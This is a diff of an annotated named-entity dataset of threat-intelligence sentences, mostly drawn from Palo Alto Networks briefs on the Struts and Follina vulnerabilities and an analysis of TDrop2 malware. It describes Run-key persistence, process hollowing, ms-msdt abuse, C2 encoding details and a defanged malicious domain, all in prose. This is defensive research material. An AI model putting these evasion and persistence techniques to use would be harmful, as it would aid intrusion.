updates.","entities":[{"id":47254,"label":"identity","start_offset":111,"end_offset":129}],"relations":[],"Comments":[]} -{"id":2117,"text":"Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.","entities":[{"id":47255,"label":"identity","start_offset":0,"end_offset":18},{"id":47256,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} +{"id":890,"text":" PClock2 also enables persistence by setting the following registry key.","entities":[{"id":46421,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} +{"id":6681,"text":" The full extent of the attack is currently unknown.","entities":[],"relations":[],"Comments":[]} +{"id":3239,"text":"The second HTTP server behaves the same as the first but returns a string, \u201cdm_online\u201d, instead.","entities":[],"relations":[],"Comments":[]} +{"id":6949,"text":"Aside from the Crimson RAT malware, the Earth Karkaddan APT group is also known to use the ObliqueRat malware in its campaigns.","entities":[{"id":21753,"label":"location","start_offset":40,"end_offset":45},{"id":21754,"label":"location","start_offset":56,"end_offset":59},{"id":21755,"label":"malware","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} +{"id":1141,"text":"While programmatic analysis would have a hard time associating the two, it's obvious to a human that the same face rolling technique was used to name this mutex.","entities":[],"relations":[],"Comments":[]} +{"id":5171,"text":" DDS is integral in embedded systems that require real-time machine-to-machine communication, facilitating a reliable communication layer between sensors, controllers, and actuators.","entities":[],"relations":[],"Comments":[]} {"id":2118,"text":" Vulnerability Information","entities":[],"relations":[],"Comments":[]} -{"id":2119,"text":"According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts.","entities":[{"id":47257,"label":"identity","start_offset":22,"end_offset":39},{"id":47258,"label":"identity","start_offset":64,"end_offset":74},{"id":47259,"label":"attack-pattern","start_offset":106,"end_offset":127},{"id":47260,"label":"SOFTWARE","start_offset":172,"end_offset":185}],"relations":[],"Comments":[]} -{"id":2120,"text":"The method of attack would be through a specially crafted URL sent to the vulnerable system.","entities":[],"relations":[],"Comments":[]} -{"id":2121,"text":"In most cases, this means no authentication is required to exploit the vulnerability.","entities":[],"relations":[],"Comments":[]} -{"id":2122,"text":"A successful attack would run code in the security context that Struts is using.","entities":[{"id":47261,"label":"SOFTWARE","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} -{"id":2123,"text":"In some cases, this could effectively lead to a total compromise of the system.","entities":[],"relations":[],"Comments":[]} -{"id":2124,"text":"It’s important to note, however, that the vulnerability is not exploitable in default configurations.","entities":[],"relations":[],"Comments":[]} -{"id":2125,"text":"The following two conditions must both be met for a system to be vulnerable to attack: If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.","entities":[{"id":47262,"label":"vulnerability","start_offset":232,"end_offset":246},{"id":47263,"label":"SOFTWARE","start_offset":96,"end_offset":102}],"relations":[],"Comments":[]} -{"id":2126,"text":"In particular, if your application uses the popular Struts Convention plugin, it appears to potentially increase your risk of exploitability vis-à-vis other Struts implementations that do not use that plugin.","entities":[{"id":47265,"label":"SOFTWARE","start_offset":52,"end_offset":58},{"id":47266,"label":"SOFTWARE","start_offset":157,"end_offset":163}],"relations":[],"Comments":[]} -{"id":2127,"text":" Threat Environment Information","entities":[],"relations":[],"Comments":[]} -{"id":2128,"text":"The vulnerability was disclosed on August 22 in conjunction with security updates that address it.","entities":[{"id":47267,"label":"TIME","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} -{"id":2129,"text":"There is detailed information about the vulnerability and how to exploit it available currently.","entities":[],"relations":[],"Comments":[]} -{"id":2130,"text":"There is also proof of concept (PoC) code available already.","entities":[],"relations":[],"Comments":[]} -{"id":2131,"text":"As noted above, the PoC works only against systems that are vulnerable and meet both conditions for exploitability.","entities":[],"relations":[],"Comments":[]} -{"id":2132,"text":"Some have noted that a previous critical Struts vulnerability was actively attacked last year only three days after the release of the security update and vulnerability information.","entities":[{"id":47268,"label":"SOFTWARE","start_offset":41,"end_offset":47}],"relations":[],"Comments":[]} -{"id":2133,"text":"There are no known active attacks at this time and the current requirement that two, non-default conditions need to be met for the vulnerability to be exploitable makes for a different threat environment.","entities":[],"relations":[],"Comments":[]} -{"id":2134,"text":"However with active PoC available we can expect at the minimum probing, if not active exploitation of this vulnerability in the near term.","entities":[],"relations":[],"Comments":[]} -{"id":2135,"text":"Organizations should focus their risk assessments for possible attack until they can patch on four things: Guidance and Protections for Palo Alto Networks Customers","entities":[{"id":47269,"label":"identity","start_offset":137,"end_offset":155}],"relations":[],"Comments":[]} -{"id":2136,"text":"All organizations running vulnerable versions of Apache Struts should deploy the security updates as soon as possible.","entities":[{"id":45399,"label":"SOFTWARE","start_offset":49,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2137,"text":"Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and on currently available information.","entities":[],"relations":[],"Comments":[]} -{"id":2138,"text":"Palo Alto Networks customers who have deployed vulnerability signatures in content release version 8057 released on August 24, 2018, which include ID 33948 Name: Apache Struts 2 Remote Code Execution Vulnerability, are protected against currently known exploits against that vulnerability.","entities":[{"id":47271,"label":"TIME","start_offset":116,"end_offset":131},{"id":47270,"label":"identity","start_offset":0,"end_offset":18},{"id":47272,"label":"SOFTWARE","start_offset":162,"end_offset":177},{"id":47273,"label":"vulnerability","start_offset":178,"end_offset":213}],"relations":[],"Comments":[]} -{"id":2139,"text":"Our customers should still deploy the security update as recommended above, but can and should deploy the latest vulnerability signature immediate for additional protection.","entities":[],"relations":[],"Comments":[]} -{"id":2140,"text":"With this addition protection available, our customers can and should include that as part of their decisions around security and deployment of the security updates and their risk assessment of the vulnerability and threat environment.","entities":[],"relations":[],"Comments":[]} -{"id":2141,"text":"As always, we are monitoring the situation closely and will provide additional details as they become available. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2142,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} -{"id":2143,"text":"On May 27, 2022, details began to emerge of malicious Word documents leveraging remote templates to execute PowerShell via the ms-msdt Office URL protocol.","entities":[{"id":47274,"label":"tools","start_offset":108,"end_offset":118},{"id":47275,"label":"TIME","start_offset":3,"end_offset":15},{"id":47276,"label":"SOFTWARE","start_offset":54,"end_offset":59}],"relations":[],"Comments":[]} -{"id":2144,"text":"The use of this technique appeared to allow attackers to bypass local Office macro policies to execute code within the context of Word.","entities":[{"id":47277,"label":"SOFTWARE","start_offset":130,"end_offset":134}],"relations":[],"Comments":[]} -{"id":2145,"text":"Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45400,"label":"vulnerability","start_offset":62,"end_offset":76},{"id":45401,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":2146,"text":" Due to the amount of publicly available information, ease of use, and the extreme effectiveness of this exploit, Palo Alto Networks is providing this threat brief to make our customers aware of this critical vulnerability and the options available to ensure proper protections are put into place until a patch can be issued by Microsoft. The vulnerability enables remote code execution with the same privileges as the calling application and there are proof-of-concept examples of zero-click variants.","entities":[{"id":47278,"label":"identity","start_offset":114,"end_offset":132},{"id":47279,"label":"identity","start_offset":328,"end_offset":337},{"id":47280,"label":"attack-pattern","start_offset":366,"end_offset":387}],"relations":[],"Comments":[]} -{"id":2147,"text":"Therefore, exploits for this vulnerability have potential to be of high impact.","entities":[],"relations":[],"Comments":[]} -{"id":2148,"text":" We highly recommend following Microsoft’s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45402,"label":"identity","start_offset":31,"end_offset":40}],"relations":[],"Comments":[]} -{"id":2149,"text":"All known samples and URLs associated with this attack have been flagged in the Palo Alto Networks product suite so customers can receive protections. Attack Details for CVE-2022-30190 CVE-2022-30190 in the Wild Conclusion On May 27, 2022, a cybersecurity research team out of Tokyo, Japan, nao_sec, uncovered a malicious Word document uploaded to VirusTotal from an IP in Belarus.","entities":[{"id":47283,"label":"TIME","start_offset":228,"end_offset":240},{"id":47288,"label":"SOFTWARE","start_offset":324,"end_offset":328},{"id":47281,"label":"vulnerability","start_offset":171,"end_offset":185},{"id":47282,"label":"vulnerability","start_offset":186,"end_offset":200},{"id":47284,"label":"identity","start_offset":80,"end_offset":98},{"id":47285,"label":"location","start_offset":279,"end_offset":291},{"id":47286,"label":"SOFTWARE","start_offset":350,"end_offset":360},{"id":47287,"label":"location","start_offset":375,"end_offset":382}],"relations":[],"Comments":[]} -{"id":2150,"text":"The document was abusing the Microsoft Word remote template feature to retrieve a malicious HTML file that subsequently used the ms-msdt Office URI scheme to execute PowerShell within the context of Word.","entities":[{"id":47290,"label":"SOFTWARE","start_offset":199,"end_offset":203},{"id":47289,"label":"tools","start_offset":166,"end_offset":176},{"id":47291,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2151,"text":" On May 30, Keven Beaumont wrote an article detailing the specifics of the initial incident.","entities":[{"id":45404,"label":"identity","start_offset":12,"end_offset":26},{"id":45403,"label":"TIME","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2152,"text":"The important thing to note here is that the decoy Word document had nothing inherently malicious outside of the link to the template hosted at hxxp:\/\/xmlformats[.]com, allowing it to bypass EDR solutions.","entities":[{"id":47292,"label":"SOFTWARE","start_offset":51,"end_offset":55},{"id":47293,"label":"URL","start_offset":144,"end_offset":167}],"relations":[],"Comments":[]} -{"id":2153,"text":"The HTML code from the remote template is shown in Figure 1 below.","entities":[],"relations":[],"Comments":[]} -{"id":2154,"text":" The JavaScript embedded within the HTML uses the ms-msdt schema to invoke the PCWDiagnostic pack, to reference the IT_BrowseForFile to execute the base64-encoded PowerShell Invoke-Expression command. The base64-decoded text within the PowerShell Invoke-Expression is shown in Figure 2 below.","entities":[{"id":47294,"label":"tools","start_offset":163,"end_offset":173},{"id":47295,"label":"tools","start_offset":237,"end_offset":247}],"relations":[],"Comments":[]} -{"id":2155,"text":" This code does a few things.","entities":[],"relations":[],"Comments":[]} -{"id":2156,"text":"First it kills the msdt.exe process.","entities":[{"id":47296,"label":"FILEPATH","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} -{"id":2157,"text":"Then the code loops through the files within a .rar archive looking for a CAB file (TVNDRgAAAA base64 decodes to MSCF, which is the magic header of a CAB file).","entities":[],"relations":[],"Comments":[]} -{"id":2158,"text":"It then stores it in a file called 1.t. 1.t, which gets base64 decoded to 1.c, expanded to rgb.exe and then finally executed.","entities":[],"relations":[],"Comments":[]} -{"id":2159,"text":" None of the reports we’ve seen have recovered the final payload.","entities":[],"relations":[],"Comments":[]} -{"id":2160,"text":"Therefore, the contents are unknown.","entities":[],"relations":[],"Comments":[]} -{"id":2161,"text":" The use of remote templates to deliver malicious documents is not new, however, historically they’ve been used to host .docm or dotm (macro-enabled Word documents), which would still be affected by the local systems’s Word macro policy.","entities":[{"id":47298,"label":"SOFTWARE","start_offset":219,"end_offset":224},{"id":47297,"label":"SOFTWARE","start_offset":149,"end_offset":153}],"relations":[],"Comments":[]} -{"id":2162,"text":"Therefore, the vulnerability of particular note in this attack lies in calling the Microsoft Support Diagnostic Tool (MSDT) using the ms-msdt URL Protocol within Word via the remotely loaded template file.","entities":[{"id":47300,"label":"SOFTWARE","start_offset":162,"end_offset":166},{"id":47299,"label":"SOFTWARE","start_offset":83,"end_offset":123}],"relations":[],"Comments":[]} -{"id":2163,"text":"This allows execution of code within the context of Microsoft Word, even if macros are disabled.","entities":[{"id":45405,"label":"SOFTWARE","start_offset":52,"end_offset":66}],"relations":[],"Comments":[]} -{"id":2164,"text":" Protected View was triggered during execution of the nao_sec example, however, John Hammond demonstrated you can bypass Protected View by using an RTF file instead.","entities":[],"relations":[],"Comments":[]} -{"id":2165,"text":"This allows the attack to succeed even if the user simply views the file in the preview pane – with no clicks on the document necessary – making the attack much more dangerous.","entities":[],"relations":[],"Comments":[]} -{"id":2166,"text":" Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45406,"label":"identity","start_offset":1,"end_offset":10},{"id":45407,"label":"vulnerability","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2167,"text":"They provided a workaround to disable the MSDT URL protocol, however, this may break other diagnostic tools that rely on the MSDT URL protocol to operate.","entities":[],"relations":[],"Comments":[]} -{"id":2168,"text":"They also recommend ensuring cloud-delivered protections and automatic sample submission for Microsoft Defender are enabled.","entities":[{"id":47301,"label":"SOFTWARE","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} -{"id":2169,"text":"Microsoft recommends that customers of Microsoft Defender for Endpoint enable the attack surface reduction rule BlockOfficeCreateProcessRule.","entities":[{"id":45408,"label":"identity","start_offset":0,"end_offset":9},{"id":45409,"label":"SOFTWARE","start_offset":39,"end_offset":70}],"relations":[],"Comments":[]} -{"id":2170,"text":" So far, Palo Alto Networks is only seeing indications of testing within our customer telemetry indicated by final payload execution of benign executables such as calc.exe and notepad.exe.","entities":[{"id":47302,"label":"identity","start_offset":9,"end_offset":27},{"id":47303,"label":"FILEPATH","start_offset":176,"end_offset":187},{"id":47304,"label":"FILEPATH","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} -{"id":2171,"text":"Palo Alto Networks and Unit 42 will continue to monitor for evidence of exploitation and further novel use cases.","entities":[{"id":47305,"label":"identity","start_offset":0,"end_offset":18},{"id":47306,"label":"identity","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} -{"id":2172,"text":" Based on the amount of publicly available information, the ease of use and the extreme effectiveness of this exploit, Palo Alto Networks highly recommends following Microsoft’s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45410,"label":"identity","start_offset":119,"end_offset":137},{"id":45411,"label":"identity","start_offset":166,"end_offset":175}],"relations":[],"Comments":[]} -{"id":2173,"text":" Next-Generation Firewalls (PA-Series, VM-Series and CN-Series) or Prisma Access with a Threat Prevention security subscription can automatically block sessions related to this vulnerability using Threat ID 92623 (Application and Threat content update 8575). WildFire and Cortex XDR categorize all known samples we’ve come across as malware.","entities":[{"id":47307,"label":"SOFTWARE","start_offset":67,"end_offset":105},{"id":47308,"label":"SOFTWARE","start_offset":260,"end_offset":268},{"id":47309,"label":"SOFTWARE","start_offset":273,"end_offset":283}],"relations":[],"Comments":[]} -{"id":2174,"text":" Cortex XDR Agent 7.5 and higher (with content version 540-92526) prevents attempts to exploit this vulnerability with the Behavioral Threat Protection module.","entities":[{"id":47310,"label":"SOFTWARE","start_offset":1,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2175,"text":"The Cortex XSOAR “CVE-2022-30190 - MSDT RCE” playbook helps speed up the discovery and remediation of compromised hosts within the network.","entities":[{"id":45412,"label":"vulnerability","start_offset":18,"end_offset":32},{"id":45413,"label":"SOFTWARE","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} -{"id":2176,"text":"The playbook can be found on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} -{"id":2177,"text":" Additionally, all encountered URLs have been flagged as malware within PAN-DB, the Advanced URL Filtering URL database.","entities":[],"relations":[],"Comments":[]} -{"id":2178,"text":"Customers can leverage this service with best practice configuration for further protection.","entities":[],"relations":[],"Comments":[]} -{"id":2179,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":47312,"label":"identity","start_offset":190,"end_offset":208},{"id":47311,"label":"identity","start_offset":92,"end_offset":122}],"relations":[],"Comments":[]} -{"id":2180,"text":"Updated June 3, 2022, at 3:30 p.m. PT.","entities":[{"id":47313,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} -{"id":2181,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2182,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2183,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2184,"text":"Palo Alto Networks recently identified a new campaign targeting the transportation sector in Europe with ties to the Dark Seoul and Operation Troy campaigns that took place in 2013.","entities":[{"id":45416,"label":"campaign","start_offset":117,"end_offset":127},{"id":45417,"label":"campaign","start_offset":132,"end_offset":146},{"id":45418,"label":"TIME","start_offset":176,"end_offset":180},{"id":45414,"label":"identity","start_offset":0,"end_offset":18},{"id":45415,"label":"location","start_offset":93,"end_offset":99},{"id":6575,"label":"threat-actor","start_offset":117,"end_offset":127}],"relations":[],"Comments":[]} -{"id":2185,"text":"This new campaign used updated instances of the Tdrop malware family discovered in the Operation Troy campaign.","entities":[{"id":6580,"label":"malware","start_offset":48,"end_offset":53},{"id":47314,"label":"campaign","start_offset":87,"end_offset":110}],"relations":[{"id":313,"from_id":47314,"to_id":6580,"type":"delivers"}],"Comments":[]} -{"id":2186,"text":"For more information on the new campaign discovered by Unit 42, please refer to our recent blog post.","entities":[{"id":47315,"label":"identity","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2187,"text":"In this attack, attackers embedded the TDrop2 malware inside a legitimate video software package hosted on the software distributor’s website.","entities":[{"id":45419,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} -{"id":2188,"text":"By doing this, they were able to target organizations that relied on the distributor’s security camera solution and infect their systems with malware.","entities":[],"relations":[],"Comments":[]} -{"id":2189,"text":"They created a true Trojan horse, which sneaks into a network as a gift, but when opened, the attacker’s army leaps out.","entities":[],"relations":[],"Comments":[]} -{"id":2190,"text":" The malware used for the attempted infection purported to be a legitimate video player, providing viewing software for security camera solutions.","entities":[],"relations":[],"Comments":[]} -{"id":2191,"text":"The following two unique file names were involved in the attack.","entities":[],"relations":[],"Comments":[]} -{"id":2192,"text":" The difference between the files involves the specific video player that was dropped and executed during runtime.","entities":[],"relations":[],"Comments":[]} -{"id":2193,"text":"Each file would drop and execute the full or light version of the legitimate video player respective to the file name.","entities":[],"relations":[],"Comments":[]} -{"id":2194,"text":" Both the legitimate copy of the video player, as well as a malicious executable were bundled into a single executable.","entities":[],"relations":[],"Comments":[]} -{"id":2195,"text":"These files were added to the end of the Trojan executable, as seen below.","entities":[],"relations":[],"Comments":[]} -{"id":2196,"text":" When initially run, the malware checks to see if its parent process is either explorer.exe or cmd.exe.","entities":[{"id":45421,"label":"FILEPATH","start_offset":95,"end_offset":102},{"id":45420,"label":"FILEPATH","start_offset":79,"end_offset":91}],"relations":[],"Comments":[]} -{"id":2197,"text":"In the event the malware is not running in the context of either of these processes, it will exit.","entities":[],"relations":[],"Comments":[]} -{"id":2198,"text":"This check exists in a number of the subsequent processes\/executables used by the TDrop2 malware variant.","entities":[{"id":6600,"label":"malware","start_offset":82,"end_offset":88}],"relations":[],"Comments":[]} -{"id":2199,"text":" Subsequently, the malware proceeds to extract both the video player and the embedded malware using a series of calls to CreateFile, CreateFileMapping, GetFileSize, and MapViewOfFile.","entities":[],"relations":[],"Comments":[]} -{"id":2200,"text":"Once extracted, the file writes it to a new file on disk prior to executing it.","entities":[],"relations":[],"Comments":[]} -{"id":2201,"text":"The video player is written to one of the following locations, based on the original filename: The malware itself is written to the %TEMP% directory as well.","entities":[{"id":47316,"label":"FILEPATH","start_offset":133,"end_offset":139}],"relations":[],"Comments":[]} -{"id":2202,"text":"The filename is derived by randomly choosing an executable name from the system32 directory.","entities":[{"id":47317,"label":"FILEPATH","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} -{"id":2203,"text":"The randomly chosen executable must not contain any of the following strings: This dropped malware begins by performing the same parent process check witnessed in the original sample.","entities":[],"relations":[],"Comments":[]} -{"id":2204,"text":"In the event the malware is not running within the parent process of cmd.exe or explorer.exe, it will exit immediately.","entities":[{"id":6607,"label":"malware","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} -{"id":2205,"text":"This malware sample will also dynamically load a number of functions and libraries.","entities":[],"relations":[],"Comments":[]} -{"id":2206,"text":"After the kernel32.dll and ntdll.dll libraries are loaded via calls to GetModuleHandle, the following process takes place:","entities":[{"id":47319,"label":"FILEPATH","start_offset":27,"end_offset":36},{"id":47318,"label":"FILEPATH","start_offset":10,"end_offset":22}],"relations":[],"Comments":[]} -{"id":2207,"text":" In total, the following 14 functions are loaded during runtime: ","entities":[],"relations":[],"Comments":[]} -{"id":2208,"text":"After these functions are loaded, the malware will randomly select an executable from the system32 using the same routine witnessed in the earlier sample.","entities":[{"id":47320,"label":"FILEPATH","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} -{"id":2209,"text":"The malware proceeds to spawn a new process of the selected executable and performs a technique called process hollowing to hide itself inside a legitimate executable.","entities":[],"relations":[],"Comments":[]} -{"id":2210,"text":"This leads us to the next stage of our malware This particular stage of malware acts as a downloader.","entities":[],"relations":[],"Comments":[]} -{"id":2211,"text":"The parent process check is not used in this particular sample.","entities":[],"relations":[],"Comments":[]} -{"id":2212,"text":"The malware initially attempts to download a file from the following location:","entities":[],"relations":[],"Comments":[]} -{"id":2213,"text":" While the link above shows a file extension of an image, the transferred file is in fact a modified executable file. The downloaded file has the first two bytes of the PE file format replaced with the characters ‘DW’, instead of the usual ‘MZ’.","entities":[],"relations":[],"Comments":[]} -{"id":2214,"text":"After the download occurs, the malware immediately corrects the first two bytes with the ‘MZ’ characters prior to writing the file to disk.","entities":[],"relations":[],"Comments":[]} -{"id":2215,"text":" The downloaded file is dropped to the system32 folder.","entities":[{"id":47321,"label":"FILEPATH","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} -{"id":2216,"text":"The malware selects a randomly chosen DLL from this directory.","entities":[],"relations":[],"Comments":[]} -{"id":2217,"text":"The base name of this DLL is used to write the downloaded file.","entities":[],"relations":[],"Comments":[]} -{"id":2218,"text":"As an example, in the event apcups.dll was selected, the malware would write the downloaded file to apcups.exe in the same folder.","entities":[{"id":47322,"label":"FILEPATH","start_offset":100,"end_offset":110}],"relations":[],"Comments":[]} -{"id":2219,"text":"The downloader then proceeds to execute this downloaded file in a new process.","entities":[],"relations":[],"Comments":[]} -{"id":2220,"text":" As we’ve seen in previous samples, this executable file begins by checking the parent process for the presence of ‘cmd.exe’ or ‘explorer.exe’.","entities":[{"id":45422,"label":"FILEPATH","start_offset":116,"end_offset":123},{"id":45423,"label":"FILEPATH","start_offset":129,"end_offset":141}],"relations":[],"Comments":[]} -{"id":2221,"text":"It proceeds to randomly select an executable file in the system32 folder, and performs process hollowing against it.","entities":[{"id":47324,"label":"attack-pattern","start_offset":87,"end_offset":104},{"id":47323,"label":"FILEPATH","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} -{"id":2222,"text":"The injected executable contains the last stage of the TDrop2 malware variant.","entities":[{"id":6630,"label":"malware","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} -{"id":2223,"text":" Upon execution, we once again see the parent process check to determine if the malware is running within the ‘cmd.exe’ or ‘explorer.exe’ parent process.","entities":[{"id":45424,"label":"FILEPATH","start_offset":111,"end_offset":118},{"id":45425,"label":"FILEPATH","start_offset":124,"end_offset":136}],"relations":[],"Comments":[]} -{"id":2224,"text":"It continues to dynamically load a number of libraries and functions for later use.","entities":[],"relations":[],"Comments":[]} -{"id":2225,"text":"A feature that has yet to be seen is that of string encryption.","entities":[],"relations":[],"Comments":[]} -{"id":2226,"text":"Strings are encrypted using the following function, represented in Python:","entities":[],"relations":[],"Comments":[]} -{"id":2227,"text":"After dynamically loading functions and libraries, the malware iterates through the running processes and attempts to determine if the ‘V3lite.exe’ process is running.","entities":[{"id":47325,"label":"FILEPATH","start_offset":136,"end_offset":146}],"relations":[],"Comments":[]} -{"id":2228,"text":"This process name is associated with the South Korean-based AhnLab security software provider.","entities":[{"id":47326,"label":"location","start_offset":41,"end_offset":53},{"id":47327,"label":"identity","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} -{"id":2229,"text":"In the event this process is running, the malware will attempt to kill the process’ class window.","entities":[],"relations":[],"Comments":[]} -{"id":2230,"text":" The final payload proceeds to generate the following mutex to ensure only one copy of the malware is running concurrently: Global\\SPPLMUTEX The payload then spawns two threads—one to maintain persistence and another to gather victim information and perform command and control operations.","entities":[],"relations":[],"Comments":[]} -{"id":2231,"text":"Persistence is achieved by setting the following registry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run The name of the registry key in the above instances is derived from the basename of the supplied argument.","entities":[{"id":6650,"label":"REGISTRYKEY","start_offset":64,"end_offset":114},{"id":6651,"label":"REGISTRYKEY","start_offset":116,"end_offset":166}],"relations":[],"Comments":[]} -{"id":2232,"text":"In the event the supplied argument was C:\\malware.exe, the registry key would be named ‘malware’, and the path for this key would be ‘C:\\malware.exe’. The persistence thread runs in a loop where the registry keys are set every 60 seconds, ensuring persistence even in the event an administrator manually deletes the registry keys.","entities":[{"id":45426,"label":"FILEPATH","start_offset":39,"end_offset":53},{"id":45427,"label":"FILEPATH","start_offset":134,"end_offset":148},{"id":6655,"label":"TIME","start_offset":222,"end_offset":238}],"relations":[],"Comments":[]} -{"id":2233,"text":" The other thread begins by collecting information about the victim, such as the following: These data points are used to generate a unique victim ID, which is stored in the following registry key: HKCU\\SOFTWARE\\Microsoft\\HY08A\\Build The malware will continue to decrypt and store embedded C2 URLs.","entities":[{"id":47328,"label":"REGISTRYKEY","start_offset":200,"end_offset":235}],"relations":[],"Comments":[]} -{"id":2234,"text":"The following URLs have been identified:","entities":[],"relations":[],"Comments":[]} -{"id":2235,"text":" The final payload proceeds to enter its command and control loop.","entities":[],"relations":[],"Comments":[]} -{"id":2236,"text":"It initially performs a DNS check against microsoft.com to ensure it has Internet connectivity.","entities":[],"relations":[],"Comments":[]} -{"id":2237,"text":"After this check is performed, it enters an infinite loop, with a sleep interval set at a default of 30 minutes.","entities":[{"id":6668,"label":"TIME","start_offset":101,"end_offset":111}],"relations":[],"Comments":[]} -{"id":2238,"text":"The malware will periodically poll the C2 server and determine if any commands are received.","entities":[],"relations":[],"Comments":[]} -{"id":2239,"text":"The initial POST request contains a unique victim identifier that was previously generated.","entities":[],"relations":[],"Comments":[]} -{"id":2240,"text":"The optional response by the C2 server is both encoded and encrypted. The data is first encrypted using an unidentified algorithm.","entities":[],"relations":[],"Comments":[]} -{"id":2241,"text":"The two keys used for this encryption are generated using another unidentified algorithm.","entities":[],"relations":[],"Comments":[]} -{"id":2242,"text":"The following Python script can be used to generate the keys.","entities":[],"relations":[],"Comments":[]} -{"id":2243,"text":"A default salt of ‘FFFFFFFF’ is used.","entities":[],"relations":[],"Comments":[]} -{"id":2244,"text":" Additionally, the following Python script can be used for encryption\/decryption ","entities":[],"relations":[],"Comments":[]} -{"id":2245,"text":"After the data is encrypted, it is then base64-encoded using a custom alphabet.","entities":[],"relations":[],"Comments":[]} +{"id":8,"text":"This tactic is a nightmare for legacy security products that are based on legacy techniques such as bytes signatures, since they can only detect attacks after the damage is done instead of preventing it as a true solution should.","entities":[],"relations":[],"Comments":[]} +{"id":1929,"text":"But this link is further fortified by the Android applications we found whose code is like that of Bahamut, with the C&C matching the usual name registration pattern of Patchwork\u2019s group, as well as an infrastructure close to an old Patchwork domain.","entities":[{"id":45181,"label":"SOFTWARE","start_offset":42,"end_offset":49},{"id":45183,"label":"threat-actor","start_offset":169,"end_offset":178},{"id":45184,"label":"threat-actor","start_offset":233,"end_offset":242},{"id":45182,"label":"malware","start_offset":99,"end_offset":106}],"relations":[{"id":80,"from_id":45182,"to_id":45183,"type":"attributed-to"}],"Comments":[]} +{"id":8880,"text":"Having the scheduled task run only once removes the notion of persistence.","entities":[{"id":27467,"label":"attack-pattern","start_offset":11,"end_offset":25},{"id":27468,"label":"location","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} +{"id":4427,"text":"The functionality was not automated and it's unclear why it was removed in later versions.","entities":[],"relations":[],"Comments":[]} {"id":2246,"text":"The following alphabet is used: 3bcd1fghijklmABCDEFGH-J+LMnopq4stuvwxyzNOPQ7STUVWXYZ0e2ar56R89K\/ ","entities":[],"relations":[],"Comments":[]} -{"id":2247,"text":"When the previously mentioned C2 response is both decoded and decrypted, we are presented with the following data: The command structure of the C2 response always begins with the string ‘tick’","entities":[],"relations":[],"Comments":[]} -{"id":2248,"text":"The number following this string is most likely a unique command identifier.","entities":[],"relations":[],"Comments":[]} -{"id":2249,"text":"The malware will store these command identifiers in the following files: In the event the number after the tick was previously witnessed, the command from the C2 will be ignored.","entities":[],"relations":[],"Comments":[]} -{"id":2250,"text":"The remaining lines are then parsed.","entities":[],"relations":[],"Comments":[]} -{"id":2251,"text":"The following commands are supported: Once again, using the previous example, the malware will first ensure that the command was not previously parsed\/executed.","entities":[],"relations":[],"Comments":[]} -{"id":2252,"text":"In the event it is new, it will proceed to execute the various reconnaissance commands found on line #2.","entities":[],"relations":[],"Comments":[]} -{"id":2253,"text":"The results of these commands are uploaded to the C2 server.","entities":[],"relations":[],"Comments":[]} -{"id":2254,"text":" As we can see in the above network traffic, the malware attempts to disguise the data as a .gif image.","entities":[],"relations":[],"Comments":[]} -{"id":2255,"text":"Finally, the malware will parse the third line, which instructs the malware to modify the wait interval to a value of ‘60’.","entities":[],"relations":[],"Comments":[]} -{"id":2256,"text":"This interval value is set in the following registry key: HKCU\\Software\\Microsoft\\HY08A\\Policy Additionally, in the event the C2 response instructs the malware to update C2 URLs, it will be in the following format: 1001; [unique_identifier] [url] The malware will encrypt the URL string with a 4-byte XOR key of “\\x01\\x02\\x03\\x04” and store this data in the following registry key: 